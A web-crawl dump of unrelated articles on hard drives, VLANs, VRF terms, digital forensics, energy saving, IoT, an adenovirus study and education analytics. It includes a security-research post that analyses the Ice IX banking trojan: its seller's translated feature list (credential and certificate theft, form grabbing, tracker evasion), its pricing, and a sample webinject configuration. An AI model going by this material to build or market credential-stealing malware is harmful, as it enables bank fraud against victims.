As a global-leading CDN (Content Delivery Network) and Edge Service provider, CDNetworks delivers fully integrated cloud and edge computing solutions with unparalleled speed, ultra-low latency, rigorous security, and reliability. Our diverse products and services include web performance, media delivery, enterprise applications, cloud security, and colocation services — all of which are designed to spur business innovation. | <urn:uuid:356c63de-cd2b-4512-8f14-2e7857b0e271> | CC-MAIN-2022-40 | https://www.cdnetworks.com/cloud-security-blog/3-key-phases-to-stop-the-bot-attacks-on-financial-services-by-cdnetworks-bot-shield/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00495.warc.gz | en | 0.909256 | 1,606 | 2.546875 | 3 |
A solid-state drive (SSD) is one of the most popular, fastest, and energy-efficient solutions for…
The first hard drive was invented by IBM in 1956. Since then, this piece of technology has completely transformed the way we compute, work and live.
Hard disk drives have been in a nearly constant state of change for the last seven decades. Manufacturers are on a near constant quest to decrease their physical size and cost while increasing their data storage capacity. Considering the average 1GB flash drive today costs less than $5—down from $849 for a 1GB external hard drive sold by Seagate in 1995—it’s safe to say significant progress has been made.
So how are they doing this, what does a hard drive do and how does a hard drive work, anyway?
What does a hard drive do?
You may think you already know the answer to this question. Hard drives store your data, right? Although technically correct, hard drives do a lot more than simply save your information. Put in extremely simple terms, hard drives read and write data.
Hard drives use a complex system of magnets and motors to read and write data in binary code, a computer language composed of a combination of “0” and “1.” Binary code is a fundamental building block of computing. Once data is converted to binary code, the information is spread over the hard drive’s thin magnetic layer. The data is then read and written by a head powered by a high-speed motor.
Information is written to the hard disk drive when an electrical current travels through the heads and imprints binary code onto the hard drive’s magnets. To read data, the process is reversed and electricity travels from the magnets to the read heads to translate the binary code into the user’s recalled information.
This process, although seemingly complicated, consists of several simple elements. But if you really want to know how does a hard drive work, you must understand the parts that make up the whole.
Components of a hard disk drive
There are many different types of hard drives out there, and most of them follow the same basic operational formula. Here are the parts making a hard disk drive tick.
Component #1: Platters
The platters are where the data is stored. They’re double-sided circular discs made of aluminum, glass or ceramic that have been magnetized to store data. Most hard disc drives contain one to five platters. A good rule of thumb: the heavier the drive, the more platters the drive contains.
Modern hard disk drives have two disk heads, one on the top and one on the bottom, to read and write data to each platter. The platters’ information is organized in tracks, sectors and cylinders. These disk heads never come into direct contact with the platters, because even a small amount of friction or a speck of dust could damage a drive.
Component #2: Spindle
Spindles work to rotate the platters when needed and to keep them in position. Most standard hard disk drives have spindle speeds of 7,200 RPM, although spindle speeds can range from 5,400 to 15,000 RPM, depending on the drive. The faster the spindle, the faster the hard drive can read and write data.
This part of the hard disk drive works hard to maintain a specific amount of space between each platter so the read/write arm can fit.
Component #3: Read/Write Arm
We’ve already mentioned the read/write heads, the parts of the hard disk drive that save and recall data from the disk. The read/write arm controls the read/write heads by ensuring they’re in the correct position to read or write data.
This part of the hard drive is also known as the head arm or actuator arm.
Component #4: Actuator
The actuator is quite literally a motor. This component receives instructions from the drive’s circuit board and moves the read/write arm accordingly. The actuator is what ensures the read/write heads are in the right place at the right time.
Hard drives from the ‘80’s used something similar called a stepper motor actuator. This component moved the heads based on a motor reacting to stepper pulses. Today, actuator movement is controlled by a voice coil actuator to control the movement of a coil toward or away from a magnetic platter.
Component #5: Printed Circuit Board (PCB)
The hard drive is powered by electricity, but how? The PCB is the brain powering the hard drive. This component has a microprocessor and an associative memory that converts electrical signals to digital signals.
PCBs hold components delivering power to each part of the hard disk drive at the right time and direct the flow of data to and from the platters and much more.
Component #6: Interface
This part of the drive connects the PCB to the hard drive itself. The interface is one of the leading factors impacting hard disk drive speed. Speed is ultimately determined by what type of interface is within the hard drive. Here are a few of the leading options:
- ATA/IDE: This was the most common PC interface until 2005.
- S-ATA (Serial ATA): This replaced the ATA/IDE and has increased hard drive speed.
- SCSI (Small Computer System Interface): This type of interface is designed to connect various peripherals through an adaptor or SCSI controller.
- SAS (Serial Attached SCSI): is the updated version of SCSI, designed to transfer data from and to hard drives.
Hard disk drive failure
Just like every other electronic device, hard drives do have a risk of failure. They can succumb to logical errors from software or firmware, mechanical damage from breakage or exposure, or simple wear and tear when a spindle or other essential component wears out.
The possibility of hard disk drive failure is why you always need to be prepared with a backup copy of your data! We recommend using a combination of an external hard disk drive and cloud-based backup service so your data will be safe and secure—no matter what happens to your local drive.
If your hard drive fails, and you’re without a backup, there’s still hope. A qualified data recovery professional can work with you to retrieve your data. Contact a data recovery specialist today to save your information. | <urn:uuid:b592a847-8a29-4e98-9c5a-578fb7912303> | CC-MAIN-2022-40 | https://drivesaversdatarecovery.com/how-does-a-hard-drive-work/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00695.warc.gz | en | 0.933768 | 1,338 | 3.78125 | 4 |
What is a VLAN and How They Work
Quick Definition: A virtual local area network (VLAN) is a way of dividing a network so that the number of broadcasts, as well as the level of access users have, is limited. The "virtual" in VLAN refers to the fact that the local area network is physically unchanged, but a layer of logic splits the network into multiple pieces.
An Overview of VLANs [VIDEO]
In this video, Jeremy Cioara covers VLANs. Having the same IP subnet is fine for a small network, but too many broadcasts can slow down the network and even the devices on it. VLANs solve that problem and can enable a “local” network across an entire campus.
How Does a Normal LAN Work?
To understand what a VLAN is, you need to understand how a normal LAN really works. Devices connected to a switch send frequent broadcasts to get IP addresses, to find network resources, and to communicate with one another. With few devices on a network, those broadcasts don't represent a problem. But if the number of devices is high, all those broadcasts can dramatically slow down each device on the network.
When you take a usual switch out of the box and start plugging devices into it, they need to be a part of the same TCP/IP subnet. To start, let's imagine that switch: a six-port switch into which we plug two devices. The first device might be at 10.1.1.50 /24 and the other at 10.1.1.51 /24. The /24 in their IP addresses simply means that anything with 10.1.1. is part of the same network as them.
These two are able to access each other and they're able to access network resources. But when they communicate, they're broadcasting to one another — and any other device on the network. A broadcast is a message that goes to everyone on the network and many network communications are transmitted as broadcasts. And those broadcasts are like highway traffic. There can only be so many cars on one road, and there can only be so many broadcasts on one network.
As the network grows, there are going to be more and more broadcasts. If those two computers become 20, which in turn become 200 — maybe eventually 2000 — computers, the number of broadcasts will also increase dramatically.
Broadcasts are a necessary part of network traffic. They need to happen. Broadcasts are how the computers get IP addresses, how they find network resources, how they communicate with each other. So broadcasts are a natural byproduct of networks, but they slow things down. They slow down the network, and even individual computers plugged into the network.
What are the Security Concerns on a LAN?
One of the benefits of a LAN is how easy it is for users to access network resources and resources on any other device on the network. This can easily be a liability too; there should always be some concern when any network user has full access to every other device. And in that respect, a LAN can be a security risk.
Imagine a less-than-scrupulous user on your network. The nature of a LAN means he can access all the resources of anyone else on the network. That bad user could fully access devices everywhere else, and if they decide to steal all the network data from another user, it's nearly impossible to prevent that from happening, without getting a high-end switch that has some extensive Layer 2 features.
Why are VLANs Better Than LANs?
A VLAN breaks a single network into multiple sections. By logically separating ports and additional switches from one another, a VLAN effectively creates multiple standalone networks out of the same networking backbone. This is more secure, and it reduces the number of broadcasts individual devices receive.
What a VLAN does, and why it's called a "virtual" LAN, is take one switch or one typical network and break it into multiples. Imagine three switches chained together by trunks. Each switch has six ports, and a device plugged into each port. We could imagine two VLANs on that network by assigning every other port to one of our VLANs. Though in reality it could be any combination of ports to VLANs.
And it could even be 20 or 200 different VLANs, all depending on your organization's needs. Maybe your organization has an accounting team and a sales team, and your VLANs are separating those teams.
You want to keep those separate first because of security. You know how those scandalous sales people can be: they'll probably hack into the accounting department to find out what the other sales reps are making. But when you put a VLAN in place, you're effectively breaking each switch into two pieces — making it impossible for users to listen in on one another just because they're on the same physical switch.
If you've seen the 1960s TV show Get Smart, you'll remember how often Maxwell Smart demanded the Cone of Silence. Well, the Cone of Silence was kind of the original VLAN. With one, what the accounting department says among themselves is kept private, and what the sales department says on their network can't be listened to.
A VLAN is an improvement on a LAN because you get a security boundary and broadcast separations.
How Many Switches Can a VLAN Support?
The beauty of VLANs is that they transcend switches. As we've already mentioned, a VLAN can pass between multiple switches, which is done through a trunk port. The limits on the number of switches and VLANs that can be created are complicated, but it would be difficult to exceed the number of switches your VLAN can support.
What happens is this: imagine that the accounting department sends a broadcast. The switch knows what other ports are assigned to the accounting dept, because you went in and configured that. On top of that, the switch looks for what Cisco calls trunk ports and what other vendors call a tagged port.
What happens is that the accounting broadcast goes out that "trunk" or "tagged" port to other, connected switches and the broadcast gets a little tag on the end that tells the next switch what VLAN it belongs to.
VLANs are numbered, they're not named. So, in our example, maybe the accounting VLAN is VLAN 10. So as the message gets forwarded down to a different switch, the broadcast gets tagged for VLAN 10 and each subsequent switch recognizes which VLAN the message belongs with — and handles it accordingly.
Trunks always forward all the traffic and still allow the VLANs to communicate. That means you can have a campus-wide VLAN network in which each separate department is separated logically through these VLANs.
How Does Voice Over IP Get Affected by VLANs?
Voice over IP is a great practical example of how VLANs enhance network operations. VoIP is a huge and growing technology — it's basically plugging a phone into a network.
From a security perspective, that seems like a terrible idea. Because now you have phone conversations going across the network in the clear. There are already tools out there. One is, in fact, very popular: WireShark. WireShark allows you to sniff network packets, take phone conversations, and convert them to .wav files. So all you have to do is just double-click the .wav and hear the phone conversation.
It gets even worse when you find out that the right design for this is to daisy-chain computers from phones to save on a cabling infrastructure. That could potentially mean that an entire organization's phone conversations pass through one network — and that's a lot of data that could interrupt or be interrupted by the other, standard, network traffic.
What you can do with VLANs is completely separate those phones into their own logically separated network. In that place, the computers cannot touch them, and vice versa.
They're completely isolated from everybody, both from a security perspective, people can't get in on WireShark and start tapping phone conversations, but also from a broadcast perspective: all that computer data will never impact the phones themselves and how they're performing.
With the security and efficiency boosts a network sees from implementing them, it's no wonder that virtual local area networks are the hallmark of a serious campus-wide network. Wiring them and configuring their operation usually requires careful attention and significant training. Need a suggestion for training? Try our Cisco CCNA training. | <urn:uuid:b25ec413-86b8-4a60-b2be-4b7b1c678e37> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/technology/networking/what-is-a-vlan-and-how-they-work | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00695.warc.gz | en | 0.953252 | 1,766 | 4.21875 | 4 |
CE device —customer edge device. A device that is part of a customer network and that interfaces to a provider edge (PE) device.
Inherit-VRF routing —Packets arriving at a VRF interface are routed by the same outgoing VRF interface.
Inter-VRF routing —Packets arriving at a VRF interface are routed via any other outgoing VRF interface.
IP —Internet Protocol. Network layer protocol in the TCP/IP stack offering a connectionless internetwork service. IP provides
features for addressing, type-of-service specification, fragmentation and reassembly, and security. Defined in RFC 791.
PBR —policy-based routing. PBR allows a user to manually configure how received packets should be routed.
PE device —provider edge device. A device that is part of a service provider’s network and that is connected to a CE device. It exchanges
routing information with CE devices by using static routing or a routing protocol such as BGP, RIPv1, or RIPv2.
VPN —Virtual Private Network. A collection of sites sharing a common routing table. A VPN provides a secure way for customers
to share bandwidth over an ISP backbone network.
VRF —A VPN routing and forwarding instance. A VRF consists of an IP routing table, a derived forwarding table, a set of interfaces
that use the forwarding table, and a set of rules and routing protocols that determine what goes into the forwarding table.
VRF-lite —A feature that enables a service provider to support two or more VPNs, where IP addresses can be overlapped among the VPNs. | <urn:uuid:d61f9320-7165-4d3d-ae49-e9f41b1e4aa4> | CC-MAIN-2022-40 | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_pi/configuration/xe-16-6/iri-xe-16-6-book/mp-mltvrf-slct-pbr.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00695.warc.gz | en | 0.888316 | 341 | 2.625 | 3 |
A new trojan was briefly presented to cybercriminals in the Russian-speaking underground in late April 2011 (as v1.0.0). The developer who wrote the new trojan and named it "Ice IX" openly declared that he had developed it from the ZeuS v2 source code, allegedly fixing flaws and bugs along the way that he believed needed attention in order to improve the product's value to its cybercriminal customers.
What's in a name: the meaning of "Ice IX"
The naming of Ice IX is quite interesting; there are a number of sources from which the developer could have been inspired to name the new trojan Ice IX. I've listed these in order from "most likely" to "least likely" to have been the inspiration.
- Ice 9 is a fictional computer virus from the film "The Recruit" (2003). The malware, named Ice-9 in tribute to Kurt Vonnegut's ice-nine (see item no. 8 below), would erase hard drives and travel through power sources which are not protected; possibly erasing data from every computer on Earth.
- Ice 9 is an album by Russian rock band Smyslovye Gallyutsinatsii, two songs from which won the Russian Golden Gramophone award twice. The band is also known under a much shorter name "Glyuki", a slang term, which means basically the same as the long name: glitches in your brain. More: http://en.wikipedia.org/wiki/Smyslovye_Gallyutsinatsii
- ICE is a well known cyberpunk reference to "Intrusion Countermeasures Electronics" - software which works to prevent intruders/hackers/cyberpunks getting access to sensitive data. It is "visible" in cyberspace as actual walls of ice, stone, or metal. Black ICE refers to ICE that are capable of killing the intruder if deemed necessary or appropriate; some forms of black ICE may be artificially-intelligent. More: http://en.wikipedia.org/wiki/Intrusion_Countermeasures_Electronics
- In cryptography, ICE (Information Concealment Engine) is a block cipher published by Kwan in 1997. The ICE algorithm is not subject to patents, and the source code is in the public domain. More: http://en.wikipedia.org/wiki/ICE_(cipher)
- The term ICE, referencing the cyberpunk usage, has been adopted by some real-world security software manufacturers: BlackICE (security software made by IBM Internet Security Systems), Black Ice Defender (security software made by Network ICE), and Network ICE itself, a security software company.
- On April 28, 2009, the Information and Communications Enhancement Act, or ICE Act for short, was introduced to the United States Senate by Senator Tom Carper to make changes to the handling of information security by the federal government, including the establishment of the National Office for Cyberspace. More: http://www.opencongress.org/bill/111-s921/show
- Ice IX is a form of solid water stable at temperatures below 140 K and pressures between 200 and 400 MPa. It has a tetragonal crystal lattice and a density of 1.16 g/cm³, 26% higher than ordinary ice. It is formed by cooling ice III from 208 K to 165 K (rapidly—to avoid forming ice II). Its structure is identical to ice III other than being proton-ordered. More: http://en.wikipedia.org/wiki/Ice_IX
- Ice-nine is a fictional material conceived by writer Kurt Vonnegut in his 1963 novel "Cat's Cradle". It is different from, and does not have the same properties as, the real-world ice polymorph Ice IX; existing, for example, as a stable solid at room temperature and regular atmospheric pressure. More: http://en.wikipedia.org/wiki/Ice-nine
- Ice 9 is a song by Joe Satriani from his album Surfing with the Alien.
- Ice Nine is a first-person shooter game for the Game Boy Advance console. More: http://en.wikipedia.org/wiki/Ice_Nine_(game)
- A substance called Ice 9 is referred to in the Nintendo DS game "999: Nine Hours, Nine Persons, Nine Doors". It seems to be a reference to Vonnegut's ice-nine substance, and not to the real thing. More: http://en.wikipedia.org/wiki/999:_Nine_Hours,_Nine_Persons,_Nine_Doors
- Ice Nine is the name of a new screenplay which is currently in development by New York production company Whiskey Outpost. More: http://whiskeyoutpost.com/ice.html
The feature the Ice IX developer considers most valuable is a defense mechanism designed to evade tracker sites, which he managed to implement in version 1.0.5 of the trojan. As the developer repeatedly stresses, his buyers will finally be able to sidestep what has apparently become quite the hurdle for cybercriminals: the ZeuS and SpyEye trackers. The two main tracker sites, "ZeuS Tracker" and "SpyEye Tracker", are operated by a Swiss-based organization that monitors and reports malicious C&C (Command and Control) servers to web users, service providers, CERTs, and law enforcement agencies. The developer claims that the evasion mechanism means the malware can be hosted on standard (legitimate) hosting servers, rather than on the expensive, so-called "bulletproof" servers that operate specifically to serve cybercrime customers.
A Better Injection Mechanism
Marketing the Malware
Extracts from the original text posted by Ice IX's developer in a Russian forum, translated to English:
Ice 9 is a new private form-grabber bot based on ZeuS, yet a serious rival to it. It is built on a modified ZeuS core that has been reworked and improved. The bypassing of firewalls and other proactive defenses has been perfected. Moreover, the injection mechanism has been improved, making the injections much more stable. The main purpose of this trojan was to counteract trackers, raising the conversion rate and the bots' TTL (time to live) compared to its predecessor. These features were successfully implemented, and we constantly work to improve the code further.
- HTTP and HTTPS form grabbing, injecting its own code into IE and IE-based browsers (Maxthon, AOL, etc.), as well as Mozilla Firefox.
- Grabbing of .sol (Flash) cookies and scraping of data from saved forms
- FTP client credentials grabbing: FlashFXP, Total Commander, WsFTP 12, FileZilla 3, FAR Manager 1, 2, WinSCP 4.2, FTP Commander, CoreFTP, SmartFTP
- Windows Mail, Live Mail, Outlook grabbing
- SOCKS proxy with back-connect capability
- Real-Time screenshots, plus the option to automate taking screenshots while the bot browses to preset URLs
- Grabs certificates from MY storage space and clears storage (certificates marked as “Non-Exportable” cannot be exported correctly). Once cleared, all new certificates will be sent to the bot master's C&C server.
- Upload specific files from the infected machine or perform searches on local disks enabling wildcards.
- TCP protocol traffic sniffer
- Elaborate set of commands to control the infected PCs
- Protected from trackers¹
- Host your botnet with conventional hosting, not needing bulletproof servers, which will save you loads of money.
- Better bot conversion rate², frequent version upgrades and tech support.
- Development of more modules and features may be negotiated at the client's request.
² Bot conversion rate is the ratio of the number of bots which actually communicate with the C&C server divided by the total number of bots infected.
Licensing and Prices for Version 1.0.5
- BASIC LICENSE: Trojan with hardcoded C&C server: $600. You get the Bot + the Builder that generates the configuration file.
- COMPLETE LICENSE: Open Trojan with unlimited Builder license: $1,800
Ice IX is offered at a lower price than what one would have paid for a comparable ZeuS kit or a SpyEye kit (SpyEye is still being sold for approximately $4,000 USD today). According to earlier posts about Ice IX, an open license to the first version, v1.0.0, was sold for $1,500.
In an English-speaking online forum, the trojan's developer gives potential buyers a glimpse into what will be included in the next upgrade:
- A function that will block the SpyEye trojan on Ice IX-infected PCs (this sounds exactly like the 'Kill ZeuS' feature of SpyEye).
- As with ZeuS, Ice IX will encrypt communication with the C&C server, but using a different encryption algorithm than ZeuS's.
After Ice IX was posted, another vendor selling HTML injections offered his stamp of approval of the trojan. One new Ice IX buyer shared his opinions on its injection mechanism:
- CSS files are successfully injected; it appears that Ice IX supports the use of Cascading Style Sheets in the process of integrating injected content into the original website's look and feel. This improvement steps up the appearance of injected content and web page replicas.
- The order of data_before, data_after, data_inject blocks plays no role. The trojan understands them in any block order. When referring to data_before / data_after blocks, the fraudster is speaking of the delimitations that must be specified to a web injection. For example:
- Data_before: When a login set requires username, password and secret question, the data_before is all three sets
- Data_inject: The additional data that the fraudster would like to inject into the page
- Data_after: The lower limit field of the data the trojan looks for
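For context, these block names come from the ZeuS-style webinject configuration format that Ice IX inherits. A typical entry might look like the following sketch; the URL, markup, and injected field here are invented for illustration:

```
set_url https://bank.example.com/login* GP
data_before
<input type="password"*>
data_end
data_inject
<br><b>ATM PIN:</b> <input type="text" name="pin" id="pin" />
data_end
data_after
</form>
data_end
```

The trojan searches the target page for the data_before and data_after delimiters and splices the data_inject content between them before the browser renders the page.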
So we can expect that from now on, more new banking malware will be based on ZeuS (and SpyEye) code. New malware developers, hoping to profit from cybercrime, will attempt to create their own new alternatives based on this source with the addition of incremental improvements over the older versions.
In recent years as computers and mobile phones have become ubiquitous, the analysis of digital evidence has become necessary in the majority of legal cases. Even where a computer or phone is unlikely to have been used directly in the commission of a crime, communications records on such devices may still reveal vital evidence as to motive or guilt.
Computer forensics, also known as digital forensics, involves the analysis of computers and other electronic devices in order to produce legal evidence. Such investigations are typically long and complex, so as the average forensic caseload grows, so too does the need for an effective method to manage the dissemination of information between the many authorised personnel involved in an investigation.
With forensic experts and police high tech crime unit personnel each performing different functions simultaneously as part of an investigation, the sheer weight of update requests sent back and forth can place a drag on the investigation. For this reason, a central location where up-to-the-minute information about a case can be gleaned is becoming essential.
With time being a factor in almost all investigations, it is simply not viable to allow a single member of personnel to become a bottleneck. Therefore, it is practical for such management to be carried out electronically through a central database, giving authorised personnel the ability to track a case’s progress without the need to inundate the Officer in Charge, or the Forensic Investigator with update requests. Similarly, the use of such a system means that the disruption caused by a staff absence can be avoided, since any required information should be entirely up-to-date and stored centrally.
In addition, if such a system includes the ability to schedule analyses, then police investigators will be able to pass back requests to prioritise particular cases or devices to ensure that findings are returned as they are needed. Where cost is a factor, such a system also helps to ensure that unnecessary analyses are not carried out.
All forensic findings must also be presented in a format that is easily understood by the potentially wide variety of parties involved in an investigation, some of whom may be significantly less well-versed in the nature of a computer forensic investigation than others. As such, a central management system with set tools for reporting findings ensures that all findings are presented in a consistent manner that is interpretable to all personnel.
For any computer forensic evidence to be admissible in court, the forensic analyst must follow set procedures for the handling of computer-based evidence as prescribed by the Association of Chief Police Officers. This means that the entire investigation must be fully auditable, with no movements left unaccounted for in the records. As such, the use of a central system to manage case progress and track resource locations is one way to ensure that evidence is not lost, contaminated or rendered inadmissible.
While most police units and computer forensic investigators have systems in place that perform some of the functions described above, a broadly used system has yet to be implemented. As computer forensic caseloads continue to grow, it seems likely that the police and computer forensic investigators will look increasingly towards a method to centralise and share data that is consistent across the UK.
Nowadays, there’s a computer in almost every home and office. A typical desktop that’s switched on 24/7 for a whole year releases carbon dioxide equivalent to what an average car releases in an 820-mile drive. To save energy, you don’t need to make drastic changes.
It’s a dilemma: you want to save energy, but you need to use your PC every day. You can turn off your computer when it’s not in use, but a plugged-in PC or electrical appliance, even when switched off, still consumes standby power. If this is the case, how exactly can you save energy? Here are some tips.
You can start by making small adjustments that will ultimately accumulate to significant savings.
Phones may have been the first devices to become “smart,” but the Internet of Things (IoT) aims to raise almost every object around us to that status. When we connect objects to the internet, the possibilities are virtually endless. We can operate them remotely from computers or phones, check on their status to ensure they’re functioning properly, or even optimize them to increase efficiency and reduce operating costs.
The potential of the Internet of Things is rapidly catching on. By 2020, it’s expected to become a $9 trillion industry — growing from just $3 trillion in 2014. From Fitbits, to the Amazon Echo and Google Home, to a toaster that will tell you the weather, IoT devices are becoming more pervasive than ever.
One of the most important contributing factors to the IoT’s continued success is the prevalence of the cloud. IoT applications are dependent on the cloud and its numerous benefits, which I outline below:
It won’t be long until nearly every device is a smart device — the IoT-connected smart home will have smart thermostats, smart lights, smart appliances, and even smart sprinklers. All these and many more devices demand additional processing power, and the cloud makes it easier for developers to deploy these processes.
- Detailed Analytics
The IoT is all about data, and the data analytics possibilities offered by the cloud will help developers understand how these devices are performing their various functions. It will also be useful to the consumer, who will be able to stay informed about the operating status of various devices. Data has been called the “new oil,” and businesses in the data and analytics space are rushing to take advantage of rich data mining opportunities presented by the IoT environment.
Cloud infrastructure provides an incredibly accessible environment where developers who aren’t backed by enormous corporate budgets can still create innovative new devices that take advantage of IoT connectivity. Without the “plug and play” opportunity provided by the cloud, these talented developers would have a much more difficult time turning their visions into reality.
Many IoT devices have struggled with security issues, and it’s no wonder consumers aren’t exactly in the habit of keeping their refrigerator’s software up to date. Fortunately, cloud connectivity can help minimize security risks. For devices with the same back-end infrastructure and APIs, security updates can be downloaded from the cloud almost instantly. Furthermore, these devices can even warn each other of potential security risks.
- Inter-Device Communication
IoT devices have a wealth of useful information to share with consumers, but they become even more effective when they share information with each other. Imagine your smart thermostat telling your smart blinds when to shut out light, saving on the cost of cooling your home in the heat of summer. The cloud facilitates the communication between these devices as interfaces become streamlined and easier to use.
IoT technologies are changing the game, but they’re also putting those reliant on legacy infrastructures at a disadvantage. We have been working on several modernization projects for enterprises looking to adopt the cloud in order to experience improved connectivity with IoT devices.
I encourage IT and business leaders to learn as much as they can about hybrid cloud and plan for a future with ubiquitous IoT. You can’t flick a switch and immediately transform a whole organization’s architecture — it will take time to plan, but a hybrid approach will allow you to establish the right mix of application hosting options.
A word of warning, though: without the reliability and processing power of the cloud, developers within your organization will have a hard time keeping up with the ongoing IoT revolution.
Researchers at Umeå University in Sweden have for the first time at the atomic level succeeded in mapping what a virus looks like that causes diarrhea and annually kills about 50,000 children in the world.
The discovery may in the long run provide the opportunity for completely new types of treatments for other viral diseases such as COVID-19.
“The findings provide an increased understanding of how the virus gets through the stomach and intestinal system. Continued research can provide answers to whether this property can also be used to create vaccines that ride ‘free rides’ and thus be given in edible form instead of as syringes,” says Lars-Anders Carlson, researcher at Umeå University.
The virus that the researchers have studied is a so-called enteric adenovirus. It has recently been clarified that enteric adenoviruses are one of the most important factors behind diarrhea among infants, and they are estimated to kill more than 50,000 children under the age of five each year, mainly in developing countries.
Most adenoviruses are respiratory, that is, they cause respiratory disease, while the lesser-known enteric variants of adenovirus instead cause gastrointestinal disease.
The enteric adenoviruses therefore need to be equipped to pass through the acidic environment of the stomach without being broken down, so that they can then infect the intestines.
With the help of the advanced cryo-electron microscope available in Umeå, the researchers have now managed to take such detailed images of an enteric adenovirus that it has been possible to put a three-dimensional puzzle that shows what the virus looks like right down to the atomic level.
The virus is one of the most complex biological structures studied at this level. The shell that protects the virus’ genome when it is spread between humans consists of two thousand protein molecules with a total of six million atoms.
The researchers were able to see that the enteric adenovirus manages to keep its structure basically unchanged at the low pH value found in the stomach.
They could also see other differences compared to respiratory adenoviruses in how a particular protein is altered in the shell of the virus as well as new clues to how the virus packs its genome inside the shell. All in all, it provides an increased understanding of how the virus manages to move on to create disease and death.
“The hope is that you will be able to turn the ability that this unpleasant virus has to get to something that can instead be used as a tool to fight disease, perhaps even COVID-19. This is a step in the right direction, but it is still a long way off,” says Lars-Anders Carlson.
Several of the new vaccines being tested against COVID-19 are based on genetically modified adenovirus. Today, these adenovirus-based vaccines must be injected to work in the body.
If a vaccine could instead be based on enteric adenovirus, the vaccine might be given in edible form. This would, of course, facilitate large-scale vaccination.
The virus that the researchers have studied is called HAdV-F41. The study is published in the scientific journal Science Advances. It is a collaboration between Lars-Anders Carlson’s and Niklas Arnberg’s research groups at Umeå University.
Adenoviruses (AdVs) are common pathogens in humans, causing diseases in the airways, eyes, and intestine, but also in the liver, urinary tract, and/or adenoids [1]. To date, more than 100 human adenovirus (HAdV) types have been isolated, characterized, and classified into seven species (A-G) [2].

The two sole members of HAdV species F, HAdV-F40 and -F41, stand out amongst HAdVs due to their pronounced gastrointestinal tropism. These so-called enteric adenoviruses are a leading cause of diarrhoea and diarrhoea-associated mortality [3] in young children, inferior only to Shigella and rotavirus [4].

Diarrhoea is estimated to cause ∼530,000 deaths/year in children younger than five years world-wide [5] and thus, there is a strong incentive to understand the structural and molecular basis of enteric HAdVs.

AdVs are double-stranded DNA viruses with an ∼35 kbp genome sheltered in a large (∼950 Å in diameter), non-enveloped capsid with icosahedral symmetry [6-11]. At each of the twelve capsid vertices, penton base subunits organise as homopentamers [12], anchoring the N-terminal tails of the protruding, trimeric fibres [13,14] to the capsid.

Another so-called major capsid protein is the hexon protein [15], present in 240 trimers per virion. Hexons are the main structural component of the virion facets and are organised to give the virion a pseudo T=25 symmetry (Fig. 1A). Hexon assemblies are stabilised by minor capsid proteins IIIa (pIIIa), pVI and pVIII (located in the capsid interior) and by pIX (exposed on the capsid exterior) [7,8,16].

To date, two human adenoviruses, HAdV-C5 [9,10,17,18] and HAdV-D26 [19], but also individual capsid proteins or their subdomains [12,15,20] of multiple adenovirus types, have been structurally determined at high resolution.

The enteric HAdVs have adapted to a tissue tropism distinct from other adenoviruses, which is presumably reflected in their capsid structure. One major known difference is that enteric HAdVs contain two different types of fibre proteins, long and short [21,22], whereas other AdVs contain only one type of fibre.

Virions dock on to cells through fibre interactions with cellular receptors, followed by internalisation mediated by penton base interactions with cellular integrins [23]. All other HAdVs contain a conserved, integrin-interacting Arg-Gly-Asp (RGD) motif in the penton base [24]. Strikingly, the enteric HAdV-F40 and -F41 lack this conserved RGD motif and thus use different integrins for entry [25], which may explain their different and much slower entry mechanism [26,27].

Despite the medical importance of enteric adenoviruses as a major cause of childhood mortality through diarrhoea, the structural basis for their infection is not known. We used cryo-EM to determine near-atomic structures of the HAdV-F41 virion at pH=7.4 and at pH=4.0, the latter set as an average of the diurnal pH in the stomach of young children [28].
These structures reveal the enteric adenovirus as having a pH-insensitive capsid with extensive surface remodelling as compared to non-enteric HAdVs. We further propose a conserved location of core protein V (pV), which links the adenovirus genome to the capsid. Lastly, we describe the assembly-induced structural changes to the penton base protein.
We believe that these findings will lay the foundation for a detailed understanding of enteric adenoviruses and how to prevent their infection.
reference link: https://www.biorxiv.org/content/10.1101/2020.07.01.181735v1.full
More information: K. Rafie et al. The structure of enteric human adenovirus 41—A leading cause of diarrhea in children, Science Advances (2021). DOI: 10.1126/sciadv.abe0974
Predictive Analytics in Education: Improving Educational Offerings with Big Data
The question is not whether schools and colleges will give kids valuable offerings, but what they would give if they knew their students' futures. With the rising demand for predictive analytics in education, that is becoming a reality.
Almost half of the higher education institutions in the US use predictive analytics (PA) as part of student learning, cultivating fresh opportunities for staff and students alike and enhancing education quality to demonstrate ROI for students.
Predictive analytics has spread beyond generic business use and into the education sector because of its accuracy in delivering personalized learning experiences and sustaining enrollment.
But before we break down PA and big data’s role in academics, let’s understand what it is.
What is Predictive Analytics?
Predictive analytics uses historical data to identify patterns and estimate the likelihood of future outcomes.
PA is way more than knowing what has happened. It understands what has happened and where it will lead in the future.
Of course, you can’t tear down complex data into meaningful outcomes and trends right away. Advanced analytics uses data mining, statistical techniques, modeling, deep learning, machine learning, and artificial intelligence to make future predictions and uncover unknown events for your referral.
As far as education is concerned, students & staff leave digital footprints at various stages of their academics, such as class engagement, facility-use, attention span, feedback, online meetings, and grades, etc. Predictive analytics-based software for higher education can churn data, model them into organized outputs, and help with essential education trends for students and organizations’ success.
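As a concrete sketch of what such modeling can look like, the toy example below trains a tiny logistic-regression classifier on made-up engagement data to flag at-risk students. The features, data, and 0.5 threshold are all invented for illustration; real systems would use far richer data and validated models.

```python
import math

def predict(w, b, x):
    """Logistic model: probability that a student drops out."""
    z = sum(wi * xi for wi, xi in zip(w, x)) + b
    return 1.0 / (1.0 + math.exp(-z))

# Historical records: [attendance_rate, normalized_grade, logins_per_week / 10]
X = [[0.95, 0.88, 1.4], [0.90, 0.75, 1.0], [0.85, 0.80, 0.9],
     [0.40, 0.55, 0.2], [0.55, 0.60, 0.3], [0.30, 0.48, 0.1]]
y = [0, 0, 0, 1, 1, 1]  # 1 = dropped out

# Train with plain stochastic gradient descent on the logistic loss.
w, b, lr = [0.0, 0.0, 0.0], 0.0, 0.5
for _ in range(2000):
    for xi, yi in zip(X, y):
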